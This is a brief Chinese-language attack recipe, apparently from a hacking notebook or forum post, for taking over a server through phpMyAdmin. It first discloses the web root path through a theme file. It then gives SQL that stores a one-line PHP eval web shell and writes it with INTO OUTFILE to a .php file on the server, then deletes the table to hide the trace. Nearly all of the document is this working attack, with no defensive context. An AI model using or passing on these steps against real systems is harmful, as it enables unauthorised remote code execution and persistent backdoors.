爆路径,访问:phpmyadmin//themes/darkblue_orange/layout.inc.php
后台选择一个数据库,执行SQL:
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php @eval($_POST['cmd']);?>");
select cmd from a into outfile 'E:/AppServ/www/phpMyAdmin/123.php';
Drop TABLE IF EXISTS a;